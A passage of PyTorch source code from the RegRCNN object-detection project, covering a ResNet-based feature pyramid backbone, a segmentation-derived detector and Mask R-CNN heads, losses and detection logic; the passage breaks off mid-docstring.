out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class FPN_pytorch_official(nn.Module):
def __init__(self, cf, conv, operate_stride1=False):
super(FPN, self).__init__()
block = Bottleneck
self.cf = cf
if cf.res_architecture == 'resnet18':
layers = [2, 2, 2, 2]
block = BasicBlock
if cf.res_architecture == 'resnet50':
layers = [3, 4, 6, 3]
if cf.res_architecture == 'resnet101':
layers = [3, 4, 23, 3]
num_classes = 1000
zero_init_residual = False
groups = 1
width_per_group = 64
replace_stride_with_dilation = None
self._norm_layer = nn.BatchNorm2d
self.inplanes = 64
self.dilation = 1
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = self._norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.out_channels = cf.end_filts
self.P5_conv1 = conv(2048, self.out_channels, ks=1, stride=1, relu=None)
self.P4_conv1 = conv(1024, self.out_channels, ks=1, stride=1, relu=None)
self.P3_conv1 = conv(512, self.out_channels, ks=1, stride=1, relu=None)
self.P2_conv1 = conv(256, self.out_channels, ks=1, stride=1, relu=None)
self.P2_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=None)
self.P3_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=None)
self.P4_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=None)
self.P5_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=None)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
c2_out = self.layer1(x)
c3_out = self.layer2(c2_out)
c4_out = self.layer3(c3_out)
c5_out = self.layer4(c4_out)
p5_pre_out = self.P5_conv1(c5_out)
p4_pre_out = self.P4_conv1(c4_out) + F.interpolate(p5_pre_out, scale_factor=2)
p3_pre_out = self.P3_conv1(c3_out) + F.interpolate(p4_pre_out, scale_factor=2)
p2_pre_out = self.P2_conv1(c2_out) + F.interpolate(p3_pre_out, scale_factor=2)
p2_out = self.P2_conv2(p2_pre_out)
p3_out = self.P3_conv2(p3_pre_out)
p4_out = self.P4_conv2(p4_pre_out)
p5_out = self.P5_conv2(p5_pre_out)
out_list = [p2_out, p3_out, p4_out, p5_out]
return out_list
```
#### File: RegRCNN/models/detection_fpn.py
```python
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from scipy.ndimage.measurements import label as lb
import utils.exp_utils as utils
import utils.model_utils as mutils
class net(nn.Module):
def __init__(self, cf, logger):
super(net, self).__init__()
self.cf = cf
self.logger = logger
backbone = utils.import_module('bbone', cf.backbone_path)
self.logger.info("loaded backbone from {}".format(self.cf.backbone_path))
conv_gen = backbone.ConvGenerator(cf.dim)
# set operate_stride1=True to generate a unet-like FPN.)
self.fpn = backbone.FPN(cf, conv=conv_gen, relu_enc=cf.relu, operate_stride1=True)
self.conv_final = conv_gen(cf.end_filts, cf.num_seg_classes, ks=1, pad=0, norm=None, relu=None)
#initialize parameters
if self.cf.weight_init=="custom":
logger.info("Tried to use custom weight init which is not defined. Using pytorch default.")
elif self.cf.weight_init:
mutils.initialize_weights(self)
else:
logger.info("using default pytorch weight init")
def forward(self, x):
"""
forward pass of network.
:param x: input image. shape (b, c, y, x, (z))
:return: seg_logits: shape (b, n_classes, y, x, (z))
:return: out_box_coords: list over n_classes. elements are arrays(b, n_rois, (y1, x1, y2, x2, (z1), (z2)))
:return: out_max_scores: list over n_classes. elements are arrays(b, n_rois)
"""
out_features = self.fpn(x)[0] #take only pyramid output of stride 1
seg_logits = self.conv_final(out_features)
out_box_coords, out_max_scores = [], []
smax = F.softmax(seg_logits.detach(), dim=1).cpu().data.numpy()
for cl in range(1, len(self.cf.class_dict.keys()) + 1):
hard_mask = np.copy(smax).argmax(1)
hard_mask[hard_mask != cl] = 0
hard_mask[hard_mask == cl] = 1
# perform connected component analysis on argmaxed predictions,
# draw boxes around components and return coordinates.
box_coords, rois = mutils.get_coords(hard_mask, self.cf.n_roi_candidates, self.cf.dim)
# for each object, choose the highest softmax score (in the respective class)
# of all pixels in the component as object score.
max_scores = [[] for _ in range(x.shape[0])]
for bix, broi in enumerate(rois):
for nix, nroi in enumerate(broi):
score_det = np.max if self.cf.score_det=="max" else np.median #score determination
max_scores[bix].append(score_det(smax[bix, cl][nroi > 0]))
out_box_coords.append(box_coords)
out_max_scores.append(max_scores)
return seg_logits, out_box_coords, out_max_scores
def train_forward(self, batch, **kwargs):
"""
train method (also used for validation monitoring). wrapper around forward pass of network. prepares input data
for processing, computes losses, and stores outputs in a dictionary.
:param batch: dictionary containing 'data', 'seg', etc.
:param kwargs:
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, n_classes]
'torch_loss': 1D torch tensor for backprop.
'class_loss': classification loss for monitoring. here: dummy array, since no classification conducted.
"""
img = torch.from_numpy(batch['data']).cuda().float()
seg = torch.from_numpy(batch['seg']).cuda().long()
seg_ohe = torch.from_numpy(mutils.get_one_hot_encoding(batch['seg'], self.cf.num_seg_classes)).cuda()
results_dict = {}
seg_logits, box_coords, max_scores = self.forward(img)
# no extra class loss applied in this model. pass dummy tensor for monitoring.
results_dict['class_loss'] = np.nan
results_dict['boxes'] = [[] for _ in range(img.shape[0])]
for cix in range(len(self.cf.class_dict.keys())):
for bix in range(img.shape[0]):
for rix in range(len(max_scores[cix][bix])):
if max_scores[cix][bix][rix] > self.cf.detection_min_confidence:
results_dict['boxes'][bix].append({'box_coords': np.copy(box_coords[cix][bix][rix]),
'box_score': max_scores[cix][bix][rix],
'box_pred_class_id': cix + 1, # add 0 for background.
'box_type': 'det'})
for bix in range(img.shape[0]):
for tix in range(len(batch['bb_target'][bix])):
gt_box = {'box_coords': batch['bb_target'][bix][tix], 'box_type': 'gt'}
for name in self.cf.roi_items:
gt_box.update({name: batch[name][bix][tix]})
results_dict['boxes'][bix].append(gt_box)
# compute segmentation loss as either weighted cross entropy, dice loss, or the sum of both.
loss = torch.tensor([0.], dtype=torch.float, requires_grad=False).cuda()
seg_pred = F.softmax(seg_logits, dim=1)
if self.cf.seg_loss_mode == 'dice' or self.cf.seg_loss_mode == 'dice_wce':
loss += 1 - mutils.batch_dice(seg_pred, seg_ohe.float(), false_positive_weight=float(self.cf.fp_dice_weight))
if self.cf.seg_loss_mode == 'wce' or self.cf.seg_loss_mode == 'dice_wce':
loss += F.cross_entropy(seg_logits, seg[:, 0], weight=torch.FloatTensor(self.cf.wce_weights).cuda())
results_dict['torch_loss'] = loss
seg_pred = seg_pred.argmax(dim=1).unsqueeze(dim=1).cpu().data.numpy()
results_dict['seg_preds'] = seg_pred
if 'dice' in self.cf.metrics:
results_dict['batch_dices'] = mutils.dice_per_batch_and_class(seg_pred, batch["seg"],
self.cf.num_seg_classes, convert_to_ohe=True)
#self.logger.info("loss: {0:.2f}".format(loss.item()))
return results_dict
def test_forward(self, batch, **kwargs):
"""
test method. wrapper around forward pass of network without usage of any ground truth information.
prepares input data for processing and stores outputs in a dictionary.
:param batch: dictionary containing 'data'
:param kwargs:
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, n_classes]
"""
img = torch.FloatTensor(batch['data']).cuda()
seg_logits, box_coords, max_scores = self.forward(img)
results_dict = {}
results_dict['boxes'] = [[] for _ in range(img.shape[0])]
for cix in range(len(box_coords)):
for bix in range(img.shape[0]):
for rix in range(len(max_scores[cix][bix])):
if max_scores[cix][bix][rix] > self.cf.detection_min_confidence:
results_dict['boxes'][bix].append({'box_coords': np.copy(box_coords[cix][bix][rix]),
'box_score': max_scores[cix][bix][rix],
'box_pred_class_id': cix + 1,
'box_type': 'det'})
results_dict['seg_preds'] = F.softmax(seg_logits, dim=1).cpu().data.numpy()
return results_dict
```
#### File: RegRCNN/models/mrcnn.py
```python
import os
from multiprocessing import Pool
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils
import utils.model_utils as mutils
import utils.exp_utils as utils
class RPN(nn.Module):
"""
Region Proposal Network.
"""
def __init__(self, cf, conv):
super(RPN, self).__init__()
self.dim = conv.dim
self.conv_shared = conv(cf.end_filts, cf.n_rpn_features, ks=3, stride=cf.rpn_anchor_stride, pad=1, relu=cf.relu)
self.conv_class = conv(cf.n_rpn_features, 2 * len(cf.rpn_anchor_ratios), ks=1, stride=1, relu=None)
self.conv_bbox = conv(cf.n_rpn_features, 2 * self.dim * len(cf.rpn_anchor_ratios), ks=1, stride=1, relu=None)
def forward(self, x):
"""
:param x: input feature maps (b, in_channels, y, x, (z))
:return: rpn_class_logits (b, 2, n_anchors)
:return: rpn_probs_logits (b, 2, n_anchors)
:return: rpn_bbox (b, 2 * dim, n_anchors)
"""
# Shared convolutional base of the RPN.
x = self.conv_shared(x)
# Anchor Score. (batch, anchors per location * 2, y, x, (z)).
rpn_class_logits = self.conv_class(x)
# Reshape to (batch, 2, anchors)
axes = (0, 2, 3, 1) if self.dim == 2 else (0, 2, 3, 4, 1)
rpn_class_logits = rpn_class_logits.permute(*axes)
rpn_class_logits = rpn_class_logits.contiguous()
rpn_class_logits = rpn_class_logits.view(x.size()[0], -1, 2)
# Softmax on last dimension (fg vs. bg).
rpn_probs = F.softmax(rpn_class_logits, dim=2)
# Bounding box refinement. (batch, anchors_per_location * (y, x, (z), log(h), log(w), (log(d)), y, x, (z))
rpn_bbox = self.conv_bbox(x)
# Reshape to (batch, 2*dim, anchors)
rpn_bbox = rpn_bbox.permute(*axes)
rpn_bbox = rpn_bbox.contiguous()
rpn_bbox = rpn_bbox.view(x.size()[0], -1, self.dim * 2)
return [rpn_class_logits, rpn_probs, rpn_bbox]
class Classifier(nn.Module):
"""
Head network for classification and bounding box refinement. Performs RoiAlign, processes resulting features through a
shared convolutional base and finally branches off the classifier- and regression head.
"""
def __init__(self, cf, conv):
super(Classifier, self).__init__()
self.cf = cf
self.dim = conv.dim
self.in_channels = cf.end_filts
self.pool_size = cf.pool_size
self.pyramid_levels = cf.pyramid_levels
# instance_norm does not work with spatial dims (1, 1, (1))
norm = cf.norm if cf.norm != 'instance_norm' else None
self.conv1 = conv(cf.end_filts, cf.end_filts * 4, ks=self.pool_size, stride=1, norm=norm, relu=cf.relu)
self.conv2 = conv(cf.end_filts * 4, cf.end_filts * 4, ks=1, stride=1, norm=norm, relu=cf.relu)
self.linear_bbox = nn.Linear(cf.end_filts * 4, cf.head_classes * 2 * self.dim)
if 'regression' in self.cf.prediction_tasks:
self.linear_regressor = nn.Linear(cf.end_filts * 4, cf.head_classes * cf.regression_n_features)
self.rg_n_feats = cf.regression_n_features
#classify into bins of regression values
elif 'regression_bin' in self.cf.prediction_tasks:
self.linear_regressor = nn.Linear(cf.end_filts * 4, cf.head_classes * len(cf.bin_labels))
self.rg_n_feats = len(cf.bin_labels)
else:
self.linear_regressor = lambda x: torch.zeros((x.shape[0], cf.head_classes * 1), dtype=torch.float32).fill_(float('NaN')).cuda()
self.rg_n_feats = 1 #cf.regression_n_features
if 'class' in self.cf.prediction_tasks:
self.linear_class = nn.Linear(cf.end_filts * 4, cf.head_classes)
else:
assert cf.head_classes == 2, "#head classes {} needs to be 2 (bg/fg) when not predicting classes".format(cf.head_classes)
self.linear_class = lambda x: torch.zeros((x.shape[0], cf.head_classes), dtype=torch.float64).cuda()
def forward(self, x, rois):
"""
:param x: input feature maps (b, in_channels, y, x, (z))
:param rois: normalized box coordinates as proposed by the RPN to be forwarded through
the second stage (n_proposals, (y1, x1, y2, x2, (z1), (z2), batch_ix). Proposals of all batch elements
have been merged to one vector, while the origin info has been stored for re-allocation.
:return: mrcnn_class_logits (n_proposals, n_head_classes)
:return: mrcnn_bbox (n_proposals, n_head_classes, 2 * dim) predicted corrections to be applied to proposals for refinement.
"""
x = mutils.pyramid_roi_align(x, rois, self.pool_size, self.pyramid_levels, self.dim)
x = self.conv1(x)
x = self.conv2(x)
x = x.view(-1, self.in_channels * 4)
mrcnn_bbox = self.linear_bbox(x)
mrcnn_bbox = mrcnn_bbox.view(mrcnn_bbox.size()[0], -1, self.dim * 2)
mrcnn_class_logits = self.linear_class(x)
mrcnn_regress = self.linear_regressor(x)
mrcnn_regress = mrcnn_regress.view(mrcnn_regress.size()[0], -1, self.rg_n_feats)
return [mrcnn_bbox, mrcnn_class_logits, mrcnn_regress]
class Mask(nn.Module):
"""
Head network for proposal-based mask segmentation. Performs RoiAlign, some convolutions and applies sigmoid on the
output logits to allow for overlapping classes.
"""
def __init__(self, cf, conv):
super(Mask, self).__init__()
self.pool_size = cf.mask_pool_size
self.pyramid_levels = cf.pyramid_levels
self.dim = conv.dim
self.conv1 = conv(cf.end_filts, cf.end_filts, ks=3, stride=1, pad=1, norm=cf.norm, relu=cf.relu)
self.conv2 = conv(cf.end_filts, cf.end_filts, ks=3, stride=1, pad=1, norm=cf.norm, relu=cf.relu)
self.conv3 = conv(cf.end_filts, cf.end_filts, ks=3, stride=1, pad=1, norm=cf.norm, relu=cf.relu)
self.conv4 = conv(cf.end_filts, cf.end_filts, ks=3, stride=1, pad=1, norm=cf.norm, relu=cf.relu)
if conv.dim == 2:
self.deconv = nn.ConvTranspose2d(cf.end_filts, cf.end_filts, kernel_size=2, stride=2)
else:
self.deconv = nn.ConvTranspose3d(cf.end_filts, cf.end_filts, kernel_size=2, stride=2)
self.relu = nn.ReLU(inplace=True) if cf.relu == 'relu' else nn.LeakyReLU(inplace=True)
self.conv5 = conv(cf.end_filts, cf.head_classes, ks=1, stride=1, relu=None)
self.sigmoid = nn.Sigmoid()
def forward(self, x, rois):
"""
:param x: input feature maps (b, in_channels, y, x, (z))
:param rois: normalized box coordinates as proposed by the RPN to be forwarded through
the second stage (n_proposals, (y1, x1, y2, x2, (z1), (z2), batch_ix). Proposals of all batch elements
have been merged to one vector, while the origin info has been stored for re-allocation.
:return: x: masks (n_sampled_proposals (n_detections in inference), n_classes, y, x, (z))
"""
x = mutils.pyramid_roi_align(x, rois, self.pool_size, self.pyramid_levels, self.dim)
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
x = self.relu(self.deconv(x))
x = self.conv5(x)
x = self.sigmoid(x)
return x
############################################################
# Loss Functions
############################################################
def compute_rpn_class_loss(rpn_class_logits, rpn_match, shem_poolsize):
"""
:param rpn_match: (n_anchors). [-1, 0, 1] for negative, neutral, and positive matched anchors.
:param rpn_class_logits: (n_anchors, 2). logits from RPN classifier.
:param SHEM_poolsize: int. factor of top-k candidates to draw from per negative sample (stochastic-hard-example-mining).
:return: loss: torch tensor
:return: np_neg_ix: 1D array containing indices of the neg_roi_logits, which have been sampled for training.
"""
# Filter out netural anchors
pos_indices = torch.nonzero(rpn_match == 1)
neg_indices = torch.nonzero(rpn_match == -1)
# loss for positive samples
if not 0 in pos_indices.size():
pos_indices = pos_indices.squeeze(1)
roi_logits_pos = rpn_class_logits[pos_indices]
pos_loss = F.cross_entropy(roi_logits_pos, torch.LongTensor([1] * pos_indices.shape[0]).cuda())
else:
pos_loss = torch.FloatTensor([0]).cuda()
# loss for negative samples: draw hard negative examples (SHEM)
# that match the number of positive samples, but at least 1.
if not 0 in neg_indices.size():
neg_indices = neg_indices.squeeze(1)
roi_logits_neg = rpn_class_logits[neg_indices]
negative_count = np.max((1, pos_indices.cpu().data.numpy().size))
roi_probs_neg = F.softmax(roi_logits_neg, dim=1)
neg_ix = mutils.shem(roi_probs_neg, negative_count, shem_poolsize)
neg_loss = F.cross_entropy(roi_logits_neg[neg_ix], torch.LongTensor([0] * neg_ix.shape[0]).cuda())
np_neg_ix = neg_ix.cpu().data.numpy()
#print("pos, neg count", pos_indices.cpu().data.numpy().size, negative_count)
else:
neg_loss = torch.FloatTensor([0]).cuda()
np_neg_ix = np.array([]).astype('int32')
loss = (pos_loss + neg_loss) / 2
return loss, np_neg_ix
def compute_rpn_bbox_loss(rpn_pred_deltas, rpn_target_deltas, rpn_match):
"""
:param rpn_target_deltas: (b, n_positive_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd)))).
Uses 0 padding to fill in unsed bbox deltas.
:param rpn_pred_deltas: predicted deltas from RPN. (b, n_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd))))
:param rpn_match: (n_anchors). [-1, 0, 1] for negative, neutral, and positive matched anchors.
:return: loss: torch 1D tensor.
"""
if not 0 in torch.nonzero(rpn_match == 1).size():
indices = torch.nonzero(rpn_match == 1).squeeze(1)
# Pick bbox deltas that contribute to the loss
rpn_pred_deltas = rpn_pred_deltas[indices]
# Trim target bounding box deltas to the same length as rpn_bbox.
target_deltas = rpn_target_deltas[:rpn_pred_deltas.size()[0], :]
# Smooth L1 loss
loss = F.smooth_l1_loss(rpn_pred_deltas, target_deltas)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_mrcnn_bbox_loss(mrcnn_pred_deltas, mrcnn_target_deltas, target_class_ids):
"""
:param mrcnn_target_deltas: (n_sampled_rois, (dy, dx, (dz), log(dh), log(dw), (log(dh)))
:param mrcnn_pred_deltas: (n_sampled_rois, n_classes, (dy, dx, (dz), log(dh), log(dw), (log(dh)))
:param target_class_ids: (n_sampled_rois)
:return: loss: torch 1D tensor.
"""
if not 0 in torch.nonzero(target_class_ids > 0).size():
positive_roi_ix = torch.nonzero(target_class_ids > 0)[:, 0]
positive_roi_class_ids = target_class_ids[positive_roi_ix].long()
target_bbox = mrcnn_target_deltas[positive_roi_ix, :].detach()
pred_bbox = mrcnn_pred_deltas[positive_roi_ix, positive_roi_class_ids, :]
loss = F.smooth_l1_loss(pred_bbox, target_bbox)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_mrcnn_mask_loss(pred_masks, target_masks, target_class_ids):
"""
:param target_masks: (n_sampled_rois, y, x, (z)) A float32 tensor of values 0 or 1. Uses zero padding to fill array.
:param pred_masks: (n_sampled_rois, n_classes, y, x, (z)) float32 tensor with values between [0, 1].
:param target_class_ids: (n_sampled_rois)
:return: loss: torch 1D tensor.
"""
#print("targ masks", target_masks.unique(return_counts=True))
if not 0 in torch.nonzero(target_class_ids > 0).size():
# Only positive ROIs contribute to the loss. And only
# the class-specific mask of each ROI.
positive_ix = torch.nonzero(target_class_ids > 0)[:, 0]
positive_class_ids = target_class_ids[positive_ix].long()
y_true = target_masks[positive_ix, :, :].detach()
y_pred = pred_masks[positive_ix, positive_class_ids, :, :]
loss = F.binary_cross_entropy(y_pred, y_true)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_mrcnn_class_loss(tasks, pred_class_logits, target_class_ids):
"""
:param pred_class_logits: (n_sampled_rois, n_classes)
:param target_class_ids: (n_sampled_rois) batch dimension was merged into roi dimension.
:return: loss: torch 1D tensor.
"""
if 'class' in tasks and not 0 in target_class_ids.size():
loss = F.cross_entropy(pred_class_logits, target_class_ids.long())
else:
loss = torch.FloatTensor([0.]).cuda()
return loss
def compute_mrcnn_regression_loss(tasks, pred, target, target_class_ids):
"""regression loss is a distance metric between target vector and predicted regression vector.
:param pred: (n_sampled_rois, n_classes, [n_rg_feats if real regression or 1 if rg_bin task)
:param target: (n_sampled_rois, [n_rg_feats or n_rg_bins])
:return: differentiable loss, torch 1D tensor on cuda
"""
if not 0 in target.shape and not 0 in torch.nonzero(target_class_ids > 0).shape:
positive_roi_ix = torch.nonzero(target_class_ids > 0)[:, 0]
positive_roi_class_ids = target_class_ids[positive_roi_ix].long()
target = target[positive_roi_ix].detach()
pred = pred[positive_roi_ix, positive_roi_class_ids]
if "regression_bin" in tasks:
loss = F.cross_entropy(pred, target.long())
else:
loss = F.smooth_l1_loss(pred, target)
#loss = F.mse_loss(pred, target)
else:
loss = torch.FloatTensor([0.]).cuda()
return loss
############################################################
# Detection Layer
############################################################
def compute_roi_scores(tasks, batch_rpn_proposals, mrcnn_cl_logits):
""" Depending on the predicition tasks: if no class prediction beyong fg/bg (--> means no additional class
head was applied) use RPN objectness scores as roi scores, otherwise class head scores.
:param cf:
:param batch_rpn_proposals:
:param mrcnn_cl_logits:
:return:
"""
if not 'class' in tasks:
scores = batch_rpn_proposals[:, :, -1].view(-1, 1)
scores = torch.cat((1 - scores, scores), dim=1)
else:
scores = F.softmax(mrcnn_cl_logits, dim=1)
return scores
############################################################
# MaskRCNN Class
############################################################
class net(nn.Module):
def __init__(self, cf, logger):
super(net, self).__init__()
self.cf = cf
self.logger = logger
self.build()
loss_order = ['rpn_class', 'rpn_bbox', 'mrcnn_bbox', 'mrcnn_mask', 'mrcnn_class', 'mrcnn_rg']
if hasattr(cf, "mrcnn_loss_weights"):
# bring into right order
self.loss_weights = np.array([cf.mrcnn_loss_weights[k] for k in loss_order])
else:
self.loss_weights = np.array([1.]*len(loss_order))
if self.cf.weight_init=="custom":
logger.info("Tried to use custom weight init which is not defined. Using pytorch default.")
elif self.cf.weight_init:
mutils.initialize_weights(self)
else:
logger.info("using default pytorch weight init")
def build(self):
"""Build Mask R-CNN architecture."""
# Image size must be dividable by 2 multiple times.
h, w = self.cf.patch_size[:2]
if h / 2**5 != int(h / 2**5) or w / 2**5 != int(w / 2**5):
raise Exception("Image size must be divisible by 2 at least 5 times "
"to avoid fractions when downscaling and upscaling."
"For example, use 256, 288, 320, 384, 448, 512, ... etc.,i.e.,"
"any number x*32 will do!")
# instantiate abstract multi-dimensional conv generator and load backbone module.
backbone = utils.import_module('bbone', self.cf.backbone_path)
self.logger.info("loaded backbone from {}".format(self.cf.backbone_path))
conv = backbone.ConvGenerator(self.cf.dim)
# build Anchors, FPN, RPN, Classifier / Bbox-Regressor -head, Mask-head
self.np_anchors = mutils.generate_pyramid_anchors(self.logger, self.cf)
self.anchors = torch.from_numpy(self.np_anchors).float().cuda()
self.fpn = backbone.FPN(self.cf, conv, relu_enc=self.cf.relu, operate_stride1=False).cuda()
self.rpn = RPN(self.cf, conv)
self.classifier = Classifier(self.cf, conv)
self.mask = Mask(self.cf, conv)
def forward(self, img, is_training=True):
"""
:param img: input images (b, c, y, x, (z)).
:return: rpn_pred_logits: (b, n_anchors, 2)
:return: rpn_pred_deltas: (b, n_anchors, (y, x, (z), log(h), log(w), (log(d))))
:return: batch_proposal_boxes: (b, n_proposals, (y1, x1, y2, x2, (z1), (z2), batch_ix)) only for monitoring/plotting.
:return: detections: (n_final_detections, (y1, x1, y2, x2, (z1), (z2), batch_ix, pred_class_id, pred_score)
:return: detection_masks: (n_final_detections, n_classes, y, x, (z)) raw molded masks as returned by mask-head.
"""
# extract features.
fpn_outs = self.fpn(img)
rpn_feature_maps = [fpn_outs[i] for i in self.cf.pyramid_levels]
self.mrcnn_feature_maps = rpn_feature_maps
# loop through pyramid layers and apply RPN.
layer_outputs = [ self.rpn(p_feats) for p_feats in rpn_feature_maps ]
# concatenate layer outputs.
# convert from list of lists of level outputs to list of lists of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
outputs = list(zip(*layer_outputs))
outputs = [torch.cat(list(o), dim=1) for o in outputs]
rpn_pred_logits, rpn_pred_probs, rpn_pred_deltas = outputs
#
# # generate proposals: apply predicted deltas to anchors and filter by foreground scores from RPN classifier.
proposal_count = self.cf.post_nms_rois_training if is_training else self.cf.post_nms_rois_inference
batch_normed_props, batch_unnormed_props = mutils.refine_proposals(rpn_pred_probs, rpn_pred_deltas,
proposal_count, self.anchors, self.cf)
# merge batch dimension of proposals while storing allocation info in coordinate dimension.
batch_ixs = torch.arange(
batch_normed_props.shape[0]).cuda().unsqueeze(1).repeat(1,batch_normed_props.shape[1]).view(-1).float()
rpn_rois = batch_normed_props[:, :, :-1].view(-1, batch_normed_props[:, :, :-1].shape[2])
self.rpn_rois_batch_info = torch.cat((rpn_rois, batch_ixs.unsqueeze(1)), dim=1)
# this is the first of two forward passes in the second stage, where no activations are stored for backprop.
# here, all proposals are forwarded (with virtual_batch_size = batch_size * post_nms_rois.)
# for inference/monitoring as well as sampling of rois for the loss functions.
# processed in chunks of roi_chunk_size to re-adjust to gpu-memory.
chunked_rpn_rois = self.rpn_rois_batch_info.split(self.cf.roi_chunk_size)
bboxes_list, class_logits_list, regressions_list = [], [], []
with torch.no_grad():
for chunk in chunked_rpn_rois:
chunk_bboxes, chunk_class_logits, chunk_regressions = self.classifier(self.mrcnn_feature_maps, chunk)
bboxes_list.append(chunk_bboxes)
class_logits_list.append(chunk_class_logits)
regressions_list.append(chunk_regressions)
mrcnn_bbox = torch.cat(bboxes_list, 0)
mrcnn_class_logits = torch.cat(class_logits_list, 0)
mrcnn_regressions = torch.cat(regressions_list, 0)
self.mrcnn_roi_scores = compute_roi_scores(self.cf.prediction_tasks, batch_normed_props, mrcnn_class_logits)
# refine classified proposals, filter and return final detections.
# returns (cf.max_inst_per_batch_element, n_coords+1+...)
detections = mutils.refine_detections(self.cf, batch_ixs, rpn_rois, mrcnn_bbox, self.mrcnn_roi_scores,
mrcnn_regressions)
# forward remaining detections through mask-head to generate corresponding masks.
scale = [img.shape[2]] * 4 + [img.shape[-1]] * 2
scale = torch.from_numpy(np.array(scale[:self.cf.dim * 2] + [1])[None]).float().cuda()
# first self.cf.dim * 2 entries on axis 1 are always the box coords, +1 is batch_ix
detection_boxes = detections[:, :self.cf.dim * 2 + 1] / scale
with torch.no_grad():
detection_masks = self.mask(self.mrcnn_feature_maps, detection_boxes)
return [rpn_pred_logits, rpn_pred_deltas, batch_unnormed_props, detections, detection_masks]
def loss_samples_forward(self, batch_gt_boxes, batch_gt_masks, batch_gt_class_ids, batch_gt_regressions=None):
"""
this is the second forward pass through the second stage (features from stage one are re-used).
samples few rois in loss_example_mining and forwards only those for loss computation.
:param batch_gt_class_ids: list over batch elements. Each element is a list over the corresponding roi target labels.
:param batch_gt_boxes: list over batch elements. Each element is a list over the corresponding roi target coordinates.
:param batch_gt_masks: (b, n(b), c, y, x (,z)) list over batch elements. Each element holds n_gt_rois(b)
(i.e., dependent on the batch element) binary masks of shape (c, y, x, (z)).
:return: sample_logits: (n_sampled_rois, n_classes) predicted class scores.
:return: sample_deltas: (n_sampled_rois, n_classes, 2 * dim) predicted corrections to be applied to proposals for refinement.
:return: sample_mask: (n_sampled_rois, n_classes, y, x, (z)) predicted masks per class and proposal.
:return: sample_target_class_ids: (n_sampled_rois) target class labels of sampled proposals.
:return: sample_target_deltas: (n_sampled_rois, 2 * dim) target deltas of sampled proposals for box refinement.
:return: sample_target_masks: (n_sampled_rois, y, x, (z)) target masks of sampled proposals.
:return: sample_proposals: (n_sampled_rois, 2 * dim) RPN output for sampled proposals. only for monitoring/plotting.
"""
# sample rois for loss and get corresponding targets for all Mask R-CNN head network losses.
sample_ics, sample_target_deltas, sample_target_mask, sample_target_class_ids, sample_target_regressions = \
mutils.loss_example_mining(self.cf, self.rpn_rois_batch_info, batch_gt_boxes, batch_gt_masks,
self.mrcnn_roi_scores, batch_gt_class_ids, batch_gt_regressions)
# re-use feature maps and RPN output from first forward pass.
sample_proposals = self.rpn_rois_batch_info[sample_ics]
if not 0 in sample_proposals.size():
sample_deltas, sample_logits, sample_regressions = self.classifier(self.mrcnn_feature_maps, sample_proposals)
sample_mask = self.mask(self.mrcnn_feature_maps, sample_proposals)
else:
sample_logits = torch.FloatTensor().cuda()
sample_deltas = torch.FloatTensor().cuda()
sample_regressions = torch.FloatTensor().cuda()
sample_mask = torch.FloatTensor().cuda()
return [sample_deltas, sample_mask, sample_logits, sample_regressions, sample_proposals,
sample_target_deltas, sample_target_mask, sample_target_class_ids, sample_target_regressions]
def get_results(self, img_shape, detections, detection_masks, box_results_list=None, return_masks=True):
"""
Restores batch dimension of merged detections, unmolds detections, creates and fills results dict.
:param img_shape:
:param detections: shape (n_final_detections, len(info)), where
info=( y1, x1, y2, x2, (z1,z2), batch_ix, pred_class_id, pred_score )
:param detection_masks: (n_final_detections, n_classes, y, x, (z)) raw molded masks as returned by mask-head.
:param box_results_list: None or list of output boxes for monitoring/plotting.
